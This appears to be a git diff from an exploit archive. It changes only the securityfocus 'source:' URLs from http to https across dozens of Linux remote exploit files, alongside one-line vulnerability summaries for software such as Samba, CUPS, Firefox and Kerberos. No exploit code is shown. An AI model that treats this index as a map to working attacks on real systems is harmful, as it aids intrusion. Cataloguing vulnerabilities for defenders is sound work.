https://www.securityfocus.com/bid/28226/info The 'lighttpd' program is prone to a vulnerability that may allow attackers to access sensitive information because the application fails to properly handle exceptional conditions. diff --git a/exploits/linux/remote/31462.c b/exploits/linux/remote/31462.c index 5b6033247..9d18b7a02 100644 --- a/exploits/linux/remote/31462.c +++ b/exploits/linux/remote/31462.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/28370/info +// source: https://www.securityfocus.com/bid/28370/info The 'xine-lib' library is prone to multiple heap-based buffer-overflow vulnerabilities because it fails to perform adequate boundary checks on user-supplied input. diff --git a/exploits/linux/remote/31540.php b/exploits/linux/remote/31540.php index 5edb44fbe..36efc7397 100644 --- a/exploits/linux/remote/31540.php +++ b/exploits/linux/remote/31540.php @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/28457/info +source: https://www.securityfocus.com/bid/28457/info PECL Alternative PHP Cache (APC) extension is prone to a buffer-overflow vulnerability because it fails to perform adequate boundary checks on user-supplied input. diff --git a/exploits/linux/remote/31591.txt b/exploits/linux/remote/31591.txt index d8beb771a..116bc169c 100644 --- a/exploits/linux/remote/31591.txt +++ b/exploits/linux/remote/31591.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/28577/info +source: https://www.securityfocus.com/bid/28577/info LANDesk Management Suite is prone to a directory-traversal vulnerability because it fails to sufficiently sanitize user-supplied input data. diff --git a/exploits/linux/remote/31630.txt b/exploits/linux/remote/31630.txt index 5526145fd..68f89519d 100644 --- a/exploits/linux/remote/31630.txt +++ b/exploits/linux/remote/31630.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/28694/info +source: https://www.securityfocus.com/bid/28694/info Adobe Flash Player is prone to a remote code-execution vulnerability when handling certain embedded ActionScript objects. diff --git a/exploits/linux/remote/31887.txt b/exploits/linux/remote/31887.txt index 97392ffde..1a6c4096d 100644 --- a/exploits/linux/remote/31887.txt +++ b/exploits/linux/remote/31887.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/29585/info +source: https://www.securityfocus.com/bid/29585/info ALFTP is prone to a directory-traversal vulnerability because the application fails to sufficiently sanitize user-supplied input. This issue occurs in the FTP client. diff --git a/exploits/linux/remote/31903.asm b/exploits/linux/remote/31903.asm index ea1a60fdf..f4d91608d 100644 --- a/exploits/linux/remote/31903.asm +++ b/exploits/linux/remote/31903.asm @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/29656/info +source: https://www.securityfocus.com/bid/29656/info NASM is prone to an off-by-one buffer-overflow vulnerability because the application fails to perform adequate boundary checks on user-supplied data. diff --git a/exploits/linux/remote/32012.txt b/exploits/linux/remote/32012.txt index 4bd73a132..e1b73c9bf 100644 --- a/exploits/linux/remote/32012.txt +++ b/exploits/linux/remote/32012.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/30115/info +source: https://www.securityfocus.com/bid/30115/info Netrw is prone to multiple command-execution vulnerabilities because the application fails to sufficiently sanitize user-supplied data. diff --git a/exploits/linux/remote/32133.txt b/exploits/linux/remote/32133.txt index aaf06b0e7..5bdb093b5 100644 --- a/exploits/linux/remote/32133.txt +++ b/exploits/linux/remote/32133.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/30467/info +source: https://www.securityfocus.com/bid/30467/info The 'libxslt' library is prone to a heap-based buffer-overflow vulnerability because the software fails to perform adequate boundary checks on user-supplied data. diff --git a/exploits/linux/remote/32165.txt b/exploits/linux/remote/32165.txt index f56396717..7a1371362 100644 --- a/exploits/linux/remote/32165.txt +++ b/exploits/linux/remote/32165.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/30535/info +source: https://www.securityfocus.com/bid/30535/info XAMPP for Linux is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. diff --git a/exploits/linux/remote/32166.txt b/exploits/linux/remote/32166.txt index f47830d6a..7a7f953da 100644 --- a/exploits/linux/remote/32166.txt +++ b/exploits/linux/remote/32166.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/30535/info +source: https://www.securityfocus.com/bid/30535/info XAMPP for Linux is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. diff --git a/exploits/linux/remote/32225.txt b/exploits/linux/remote/32225.txt index bdaf3354c..78c00bb5a 100644 --- a/exploits/linux/remote/32225.txt +++ b/exploits/linux/remote/32225.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/30648/info +source: https://www.securityfocus.com/bid/30648/info Vim is prone to a heap-based buffer-overflow vulnerability because it fails to perform adequate boundary checks on user-supplied data. diff --git a/exploits/linux/remote/32228.xml b/exploits/linux/remote/32228.xml index cdc7c8800..84881816f 100644 --- a/exploits/linux/remote/32228.xml +++ b/exploits/linux/remote/32228.xml @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/30661/info +source: https://www.securityfocus.com/bid/30661/info Bugzilla is prone to a directory-traversal vulnerability because the application fails to sufficiently sanitize user-supplied input. diff --git a/exploits/linux/remote/32286.txt b/exploits/linux/remote/32286.txt index 333900817..d7c41162b 100644 --- a/exploits/linux/remote/32286.txt +++ b/exploits/linux/remote/32286.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/30780/info +source: https://www.securityfocus.com/bid/30780/info Fujitsu Web-Based Admin View is prone to a directory-traversal vulnerability because the application fails to sufficiently sanitize user-supplied input. This issue occurs in the application's HTTP server. diff --git a/exploits/linux/remote/32289.txt b/exploits/linux/remote/32289.txt index ca7b8a7c2..9d2749173 100644 --- a/exploits/linux/remote/32289.txt +++ b/exploits/linux/remote/32289.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/30795/info +source: https://www.securityfocus.com/bid/30795/info Vim is prone to multiple command-execution vulnerabilities because the application fails to sufficiently sanitize user-supplied data. diff --git a/exploits/linux/remote/32303.txt b/exploits/linux/remote/32303.txt index a810b8d78..9aec5f7e3 100644 --- a/exploits/linux/remote/32303.txt +++ b/exploits/linux/remote/32303.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/30867/info +source: https://www.securityfocus.com/bid/30867/info Mono is prone to a vulnerability that allows attackers to inject arbitrary HTTP headers because it fails to sanitize input. diff --git a/exploits/linux/remote/32445.txt b/exploits/linux/remote/32445.txt index 4fae35236..719fcbc13 100644 --- a/exploits/linux/remote/32445.txt +++ b/exploits/linux/remote/32445.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/31486/info +source: https://www.securityfocus.com/bid/31486/info MySQL is prone to an HTML-injection vulnerability because the application's command-line client fails to properly sanitize user-supplied input before using it in dynamically generated content. diff --git a/exploits/linux/remote/32470.rb b/exploits/linux/remote/32470.rb index 8637123d6..724e51fc5 100755 --- a/exploits/linux/remote/32470.rb +++ b/exploits/linux/remote/32470.rb @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/31688/info +source: https://www.securityfocus.com/bid/31688/info CUPS is prone to a remote code-execution vulnerability caused by an error in the 'HP-GL/2 filter. diff --git a/exploits/linux/remote/32530.txt b/exploits/linux/remote/32530.txt index 4963e1305..be62bc642 100644 --- a/exploits/linux/remote/32530.txt +++ b/exploits/linux/remote/32530.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/31917/info +source: https://www.securityfocus.com/bid/31917/info Lynx is prone to a local code-execution vulnerability. diff --git a/exploits/linux/remote/32548.html b/exploits/linux/remote/32548.html index 717d20176..ddef7b41b 100644 --- a/exploits/linux/remote/32548.html +++ b/exploits/linux/remote/32548.html @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/31991/info +source: https://www.securityfocus.com/bid/31991/info Opera Web Browser is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. diff --git a/exploits/linux/remote/32690.txt b/exploits/linux/remote/32690.txt index 446a96f1d..fdaaa6c1a 100644 --- a/exploits/linux/remote/32690.txt +++ b/exploits/linux/remote/32690.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/33060/info +source: https://www.securityfocus.com/bid/33060/info The 'xterm' program is prone to a remote command-execution vulnerability because it fails to sufficiently validate user input. diff --git a/exploits/linux/remote/32691.txt b/exploits/linux/remote/32691.txt index 75d690420..47fff11c4 100644 --- a/exploits/linux/remote/32691.txt +++ b/exploits/linux/remote/32691.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/33066/info +source: https://www.securityfocus.com/bid/33066/info Audio File Library ('libaudiofile') is prone to a heap-based buffer-overflow vulnerability because it fails to properly bounds-check user-supplied data. diff --git a/exploits/linux/remote/32780.py b/exploits/linux/remote/32780.py index 723b2e047..f2e06dfcc 100755 --- a/exploits/linux/remote/32780.py +++ b/exploits/linux/remote/32780.py @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/33674/info +source: https://www.securityfocus.com/bid/33674/info PyCrypto (Python Cryptography Toolkit) is prone to a buffer-overflow vulnerability because it fails to adequately verify user-supplied input. diff --git a/exploits/linux/remote/32796.txt b/exploits/linux/remote/32796.txt index a92452150..60c210452 100644 --- a/exploits/linux/remote/32796.txt +++ b/exploits/linux/remote/32796.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/33716/info +source: https://www.securityfocus.com/bid/33716/info Swann DVR4 SecuraNet is prone to a directory-traversal vulnerability because it fails to sufficiently sanitize user-supplied input data. diff --git a/exploits/linux/remote/32825.txt b/exploits/linux/remote/32825.txt index df795388b..7d56db039 100644 --- a/exploits/linux/remote/32825.txt +++ b/exploits/linux/remote/32825.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/33937/info +source: https://www.securityfocus.com/bid/33937/info The 'djbdns' package is prone to a remote cache-poisoning vulnerability. diff --git a/exploits/linux/remote/32834.txt b/exploits/linux/remote/32834.txt index f772d6702..45571ca67 100644 --- a/exploits/linux/remote/32834.txt +++ b/exploits/linux/remote/32834.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/33962/info +source: https://www.securityfocus.com/bid/33962/info cURL/libcURL is prone to a security-bypass vulnerability. diff --git a/exploits/linux/remote/32837.py b/exploits/linux/remote/32837.py index 0120c828f..09ab3b46d 100755 --- a/exploits/linux/remote/32837.py +++ b/exploits/linux/remote/32837.py @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/33971/info +source: https://www.securityfocus.com/bid/33971/info Wesnoth is prone to a remote code-execution vulnerability caused by a design error. diff --git a/exploits/linux/remote/32929.txt b/exploits/linux/remote/32929.txt index d427c2e75..5545a15e4 100644 --- a/exploits/linux/remote/32929.txt +++ b/exploits/linux/remote/32929.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/34606/info +source: https://www.securityfocus.com/bid/34606/info Red Hat Stronghold Web Server is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. diff --git a/exploits/linux/remote/32942.txt b/exploits/linux/remote/32942.txt index 98da2f2e1..e0df488dc 100644 --- a/exploits/linux/remote/32942.txt +++ b/exploits/linux/remote/32942.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/34656/info +source: https://www.securityfocus.com/bid/34656/info The Mozilla Foundation has released multiple security advisories specifying various vulnerabilities in Firefox, Thunderbird, and SeaMonkey. diff --git a/exploits/linux/remote/32965.c b/exploits/linux/remote/32965.c index 3948741c7..24124b427 100644 --- a/exploits/linux/remote/32965.c +++ b/exploits/linux/remote/32965.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/34783/info +// source: https://www.securityfocus.com/bid/34783/info GnuTLS is prone to multiple remote vulnerabilities: diff --git a/exploits/linux/remote/33032.txt b/exploits/linux/remote/33032.txt index 2497567cc..185eebdcd 100644 --- a/exploits/linux/remote/33032.txt +++ b/exploits/linux/remote/33032.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/35307/info +source: https://www.securityfocus.com/bid/35307/info The 'Compress::Raw::Zlib' Perl module is prone to a remote code-execution vulnerability. diff --git a/exploits/linux/remote/33034.txt b/exploits/linux/remote/33034.txt index 1c6c1c8e4..b80f3be92 100644 --- a/exploits/linux/remote/33034.txt +++ b/exploits/linux/remote/33034.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/35321/info +source: https://www.securityfocus.com/bid/35321/info WebKit is prone to a remote information-disclosure vulnerability. diff --git a/exploits/linux/remote/33039.txt b/exploits/linux/remote/33039.txt index eb180dce4..bbdeecf60 100644 --- a/exploits/linux/remote/33039.txt +++ b/exploits/linux/remote/33039.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/35388/info +source: https://www.securityfocus.com/bid/35388/info Mozilla Firefox and SeaMonkey are affected by a URI-spoofing vulnerability because they fail to adequately handle user-supplied data. diff --git a/exploits/linux/remote/33053.txt b/exploits/linux/remote/33053.txt index 880e9227b..b3f7121b6 100644 --- a/exploits/linux/remote/33053.txt +++ b/exploits/linux/remote/33053.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/35472/info +source: https://www.securityfocus.com/bid/35472/info Samba is prone to multiple vulnerabilities. diff --git a/exploits/linux/remote/33103.html b/exploits/linux/remote/33103.html index 1c40b0ea5..fa74c5d5b 100644 --- a/exploits/linux/remote/33103.html +++ b/exploits/linux/remote/33103.html @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/35803/info +source: https://www.securityfocus.com/bid/35803/info Mozilla Firefox is affected by a URI-spoofing vulnerability. diff --git a/exploits/linux/remote/33311.txt b/exploits/linux/remote/33311.txt index 5bd8b41f2..db10f6c5a 100644 --- a/exploits/linux/remote/33311.txt +++ b/exploits/linux/remote/33311.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/36845/info +source: https://www.securityfocus.com/bid/36845/info KDE is prone to multiple input-validation vulnerabilities that affect 'Ark', 'IO Slaves', and 'Kmail'. diff --git a/exploits/linux/remote/33313.txt b/exploits/linux/remote/33313.txt index 8d2d6be06..d022fc824 100644 --- a/exploits/linux/remote/33313.txt +++ b/exploits/linux/remote/33313.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/36855/info +source: https://www.securityfocus.com/bid/36855/info Mozilla Firefox and SeaMonkey are prone to a heap-based buffer-overflow vulnerability. diff --git a/exploits/linux/remote/33315.java b/exploits/linux/remote/33315.java index 48a17e975..b92530c3d 100644 --- a/exploits/linux/remote/33315.java +++ b/exploits/linux/remote/33315.java @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/36881/info +source: https://www.securityfocus.com/bid/36881/info Sun has released updates to address multiple security vulnerabilities in Java SE. diff --git a/exploits/linux/remote/33364.txt b/exploits/linux/remote/33364.txt index eb56ca99b..946d55952 100644 --- a/exploits/linux/remote/33364.txt +++ b/exploits/linux/remote/33364.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/37080/info +source: https://www.securityfocus.com/bid/37080/info KDE is prone to a remote code-execution vulnerability that affects KDELibs. diff --git a/exploits/linux/remote/33388.f b/exploits/linux/remote/33388.f index b962532a5..1c1340e92 100644 --- a/exploits/linux/remote/33388.f +++ b/exploits/linux/remote/33388.f @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/37193/info +source: https://www.securityfocus.com/bid/37193/info Xfig and Transfig are prone to a buffer-overflow vulnerability because they fail to perform adequate boundary checks on user-supplied input. diff --git a/exploits/linux/remote/33402.txt b/exploits/linux/remote/33402.txt index c9d185d4b..25205b15d 100644 --- a/exploits/linux/remote/33402.txt +++ b/exploits/linux/remote/33402.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/37322/info +source: https://www.securityfocus.com/bid/37322/info Ruby on Rails is prone to a cross-site request-forgery vulnerability. diff --git a/exploits/linux/remote/33535.txt b/exploits/linux/remote/33535.txt index da0108738..f2fe2e792 100644 --- a/exploits/linux/remote/33535.txt +++ b/exploits/linux/remote/33535.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/37842/info +source: https://www.securityfocus.com/bid/37842/info SystemTap is prone to a remote command-injection vulnerability because it fails to adequately sanitize user-supplied input data. diff --git a/exploits/linux/remote/33598.rb b/exploits/linux/remote/33598.rb index f0bc99eae..3deb60c16 100755 --- a/exploits/linux/remote/33598.rb +++ b/exploits/linux/remote/33598.rb @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/38111/info +source: https://www.securityfocus.com/bid/38111/info Samba is prone to a directory-traversal vulnerability because the application fails to sufficiently sanitize user-supplied input. diff --git a/exploits/linux/remote/33599.txt b/exploits/linux/remote/33599.txt index f843691f4..74421a819 100644 --- a/exploits/linux/remote/33599.txt +++ b/exploits/linux/remote/33599.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/38111/info +source: https://www.securityfocus.com/bid/38111/info Samba is prone to a directory-traversal vulnerability because the application fails to sufficiently sanitize user-supplied input. diff --git a/exploits/linux/remote/33620.txt b/exploits/linux/remote/33620.txt index a1057ee4e..1c112b5b2 100644 --- a/exploits/linux/remote/33620.txt +++ b/exploits/linux/remote/33620.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/38161/info +source: https://www.securityfocus.com/bid/38161/info Helix Player is prone to a buffer-overflow vulnerability because it fails to perform adequate boundary checks on user-supplied input. diff --git a/exploits/linux/remote/33622.txt b/exploits/linux/remote/33622.txt index 3d8485009..90a16818e 100644 --- a/exploits/linux/remote/33622.txt +++ b/exploits/linux/remote/33622.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/38176/info +source: https://www.securityfocus.com/bid/38176/info Accellion File Transfer Appliance is prone to multiple remote vulnerabilities, including: diff --git a/exploits/linux/remote/33752.html b/exploits/linux/remote/33752.html index 8a4b2e5aa..f99aeff98 100644 --- a/exploits/linux/remote/33752.html +++ b/exploits/linux/remote/33752.html @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/38689/info +source: https://www.securityfocus.com/bid/38689/info WebKit is prone to a remote memory-corruption vulnerability; fixes are available. diff --git a/exploits/linux/remote/33783.txt b/exploits/linux/remote/33783.txt index 71c15ea29..149af5da5 100644 --- a/exploits/linux/remote/33783.txt +++ b/exploits/linux/remote/33783.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/38893/info +source: https://www.securityfocus.com/bid/38893/info Astaro Security Linux is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. diff --git a/exploits/linux/remote/33798.html b/exploits/linux/remote/33798.html index bc5084a2b..8bec053cb 100644 --- a/exploits/linux/remote/33798.html +++ b/exploits/linux/remote/33798.html @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/38927/info +source: https://www.securityfocus.com/bid/38927/info Mozilla Firefox is prone to a security-bypass vulnerability. diff --git a/exploits/linux/remote/33826.txt b/exploits/linux/remote/33826.txt index af8750e24..a67a5a57d 100644 --- a/exploits/linux/remote/33826.txt +++ b/exploits/linux/remote/33826.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/39315/info +source: https://www.securityfocus.com/bid/39315/info TCPDF is prone to a security weakness that may allow attackers to execute arbitrary code. diff --git a/exploits/linux/remote/33855.txt b/exploits/linux/remote/33855.txt index 0039587a8..57b09cb25 100644 --- a/exploits/linux/remote/33855.txt +++ b/exploits/linux/remote/33855.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/39599/info +source: https://www.securityfocus.com/bid/39599/info MIT Kerberos is prone to a remote memory-corruption vulnerability. diff --git a/exploits/linux/remote/33949.txt b/exploits/linux/remote/33949.txt index 69ecd0cd4..cb4c5b788 100644 --- a/exploits/linux/remote/33949.txt +++ b/exploits/linux/remote/33949.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/39974/info +source: https://www.securityfocus.com/bid/39974/info PCRE is prone to a buffer-overflow vulnerability because the library fails to perform adequate boundary checks on user-supplied input. diff --git a/exploits/linux/remote/34152.txt b/exploits/linux/remote/34152.txt index 4cd9746e3..8076aa191 100644 --- a/exploits/linux/remote/34152.txt +++ b/exploits/linux/remote/34152.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/40897/info +source: https://www.securityfocus.com/bid/40897/info CUPS is prone to a remote information-disclosure vulnerability. This issue affects the CUPS web interface component. diff --git a/exploits/linux/remote/34192.txt b/exploits/linux/remote/34192.txt index e5298fa25..38a7daeba 100644 --- a/exploits/linux/remote/34192.txt +++ b/exploits/linux/remote/34192.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/41082/info +source: https://www.securityfocus.com/bid/41082/info Mozilla Firefox, SeaMonkey, and Thunderbird are prone to a remote integer-overflow vulnerability. diff --git a/exploits/linux/remote/34201.txt b/exploits/linux/remote/34201.txt index aebb3cb4c..537462029 100644 --- a/exploits/linux/remote/34201.txt +++ b/exploits/linux/remote/34201.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/41161/info +source: https://www.securityfocus.com/bid/41161/info feh is prone to a remote code-execution vulnerability. diff --git a/exploits/linux/remote/34358.txt b/exploits/linux/remote/34358.txt index abc62c97b..1ce43a125 100644 --- a/exploits/linux/remote/34358.txt +++ b/exploits/linux/remote/34358.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/41842/info +source: https://www.securityfocus.com/bid/41842/info Mozilla Firefox and SeaMonkey are prone to a buffer-overflow vulnerability. diff --git a/exploits/linux/remote/34385.txt b/exploits/linux/remote/34385.txt index 72afc61f0..e67fb2da9 100644 --- a/exploits/linux/remote/34385.txt +++ b/exploits/linux/remote/34385.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/42026/info +source: https://www.securityfocus.com/bid/42026/info KVIrc is prone to a remote command-execution vulnerability because the application fails to sufficiently sanitize user-supplied input. diff --git a/exploits/linux/remote/34426.txt b/exploits/linux/remote/34426.txt index 080e145b9..12038e84e 100644 --- a/exploits/linux/remote/34426.txt +++ b/exploits/linux/remote/34426.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/42297/info +source: https://www.securityfocus.com/bid/42297/info uzbl 'uzbl-core' is prone to a vulnerability that lets attackers inject arbitrary commands because the application fails to adequately sanitize user-supplied input. This issue stems from an insecure default configuration setting. diff --git a/exploits/linux/remote/34431.html b/exploits/linux/remote/34431.html index f54be9fcd..78a6210d9 100644 --- a/exploits/linux/remote/34431.html +++ b/exploits/linux/remote/34431.html @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/42322/info +source: https://www.securityfocus.com/bid/42322/info Nagios XI is prone to multiple cross-site request-forgery vulnerabilities because the application fails to properly validate HTTP requests. diff --git a/exploits/linux/remote/34507.txt b/exploits/linux/remote/34507.txt index 4f66a0edd..2c5bb4da0 100644 --- a/exploits/linux/remote/34507.txt +++ b/exploits/linux/remote/34507.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/42604/info +source: https://www.securityfocus.com/bid/42604/info Nagios XI is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. diff --git a/exploits/linux/remote/34881.html b/exploits/linux/remote/34881.html index e2f32e68c..b1c14b8b1 100644 --- a/exploits/linux/remote/34881.html +++ b/exploits/linux/remote/34881.html @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/44247/info +source: https://www.securityfocus.com/bid/44247/info Mozilla Firefox, Thunderbird, and Seamonkey are prone to a memory-corruption vulnerability because they fail to adequately validate user-supplied data. diff --git a/exploits/linux/remote/34932.html b/exploits/linux/remote/34932.html index 6d8d70b6d..e93bf3957 100644 --- a/exploits/linux/remote/34932.html +++ b/exploits/linux/remote/34932.html @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/44421/info +source: https://www.securityfocus.com/bid/44421/info NitroView ESM is prone to a remote command-execution vulnerability because it fails to adequately sanitize user-supplied input. diff --git a/exploits/linux/remote/34998.txt b/exploits/linux/remote/34998.txt index afe9065c0..917bbbb36 100644 --- a/exploits/linux/remote/34998.txt +++ b/exploits/linux/remote/34998.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/44883/info +source: https://www.securityfocus.com/bid/44883/info Eclipse IDE Help component is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. diff --git a/exploits/linux/remote/34999.txt b/exploits/linux/remote/34999.txt index aa8d416fe..e59105487 100644 --- a/exploits/linux/remote/34999.txt +++ b/exploits/linux/remote/34999.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/44883/info +source: https://www.securityfocus.com/bid/44883/info Eclipse IDE Help component is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. diff --git a/exploits/linux/remote/35011.txt b/exploits/linux/remote/35011.txt index d4303edec..be784b6e6 100644 --- a/exploits/linux/remote/35011.txt +++ b/exploits/linux/remote/35011.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/45015/info +source: https://www.securityfocus.com/bid/45015/info Apache Tomcat is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. diff --git a/exploits/linux/remote/35095.txt b/exploits/linux/remote/35095.txt index 4c2b7a2da..0ee383a5e 100644 --- a/exploits/linux/remote/35095.txt +++ b/exploits/linux/remote/35095.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/45353/info +source: https://www.securityfocus.com/bid/45353/info Mozilla Firefox, SeaMonkey, and Thunderbird are prone to multiple HTML-injection vulnerabilities. diff --git a/exploits/linux/remote/35132.txt b/exploits/linux/remote/35132.txt index a034b2ca7..7a5bfbdc6 100644 --- a/exploits/linux/remote/35132.txt +++ b/exploits/linux/remote/35132.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/45537/info +source: https://www.securityfocus.com/bid/45537/info Mitel Audio and Web Conferencing (AWC) is prone to a remote command-injection vulnerability because it fails to adequately sanitize user-supplied input data. diff --git a/exploits/linux/remote/35148.txt b/exploits/linux/remote/35148.txt index 10cce0b1f..9a17ec408 100644 --- a/exploits/linux/remote/35148.txt +++ b/exploits/linux/remote/35148.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/45582/info +source: https://www.securityfocus.com/bid/45582/info IBM Tivoli Access Manager for e-business is prone to a directory-traversal vulnerability because it fails to sufficiently sanitize user-supplied input. diff --git a/exploits/linux/remote/35232.txt b/exploits/linux/remote/35232.txt index 38d25eb35..d8e13ffc1 100644 --- a/exploits/linux/remote/35232.txt +++ b/exploits/linux/remote/35232.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/45842/info +source: https://www.securityfocus.com/bid/45842/info Pango is prone to a remote heap-corruption vulnerability. diff --git a/exploits/linux/remote/35314.txt b/exploits/linux/remote/35314.txt index 5808acafd..eb941323d 100644 --- a/exploits/linux/remote/35314.txt +++ b/exploits/linux/remote/35314.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/46167/info +source: https://www.securityfocus.com/bid/46167/info Wireshark is prone to a memory-corruption vulnerability because it fails to properly handle certain files. diff --git a/exploits/linux/remote/35386.txt b/exploits/linux/remote/35386.txt index d0f128d1c..119170c0d 100644 --- a/exploits/linux/remote/35386.txt +++ b/exploits/linux/remote/35386.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/46554/info +source: https://www.securityfocus.com/bid/46554/info Logwatch is prone to a local privilege-escalation vulnerability. diff --git a/exploits/linux/remote/35466.sh b/exploits/linux/remote/35466.sh index 70ecce34a..99d14ed93 100755 --- a/exploits/linux/remote/35466.sh +++ b/exploits/linux/remote/35466.sh @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/46880/info +source: https://www.securityfocus.com/bid/46880/info nostromo nhttpd is prone to a remote command-execution vulnerability because it fails to properly validate user-supplied data. diff --git a/exploits/linux/remote/35554.txt b/exploits/linux/remote/35554.txt index 4eda367a9..19eda29be 100644 --- a/exploits/linux/remote/35554.txt +++ b/exploits/linux/remote/35554.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/47124/info +source: https://www.securityfocus.com/bid/47124/info Perl is prone to a security-bypass weakness that occurs when laundering tainted input. diff --git a/exploits/linux/remote/35606.txt b/exploits/linux/remote/35606.txt index 4538433f4..c4ee9bb19 100644 --- a/exploits/linux/remote/35606.txt +++ b/exploits/linux/remote/35606.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/47310/info +source: https://www.securityfocus.com/bid/47310/info MIT Kerberos is prone to a remote code-execution vulnerability in 'kadmind'. diff --git a/exploits/linux/remote/35644.txt b/exploits/linux/remote/35644.txt index 299b79c69..71cfdafcc 100644 --- a/exploits/linux/remote/35644.txt +++ b/exploits/linux/remote/35644.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/47509/info +source: https://www.securityfocus.com/bid/47509/info Viola DVR is prone to multiple directory-traversal vulnerabilities because it fails to sufficiently sanitize user-supplied input. diff --git a/exploits/linux/remote/35784.php b/exploits/linux/remote/35784.php index 707b06b10..037e8bcde 100644 --- a/exploits/linux/remote/35784.php +++ b/exploits/linux/remote/35784.php @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/47919/info +source: https://www.securityfocus.com/bid/47919/info Zend Framework is prone to a security-bypass vulnerability. diff --git a/exploits/linux/remote/35785.txt b/exploits/linux/remote/35785.txt index a50104208..49b17527e 100644 --- a/exploits/linux/remote/35785.txt +++ b/exploits/linux/remote/35785.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/47924/info +source: https://www.securityfocus.com/bid/47924/info klibc is prone to a shell-command-execution vulnerability because the application fails to properly sanitize user-supplied input. diff --git a/exploits/linux/remote/35799.txt 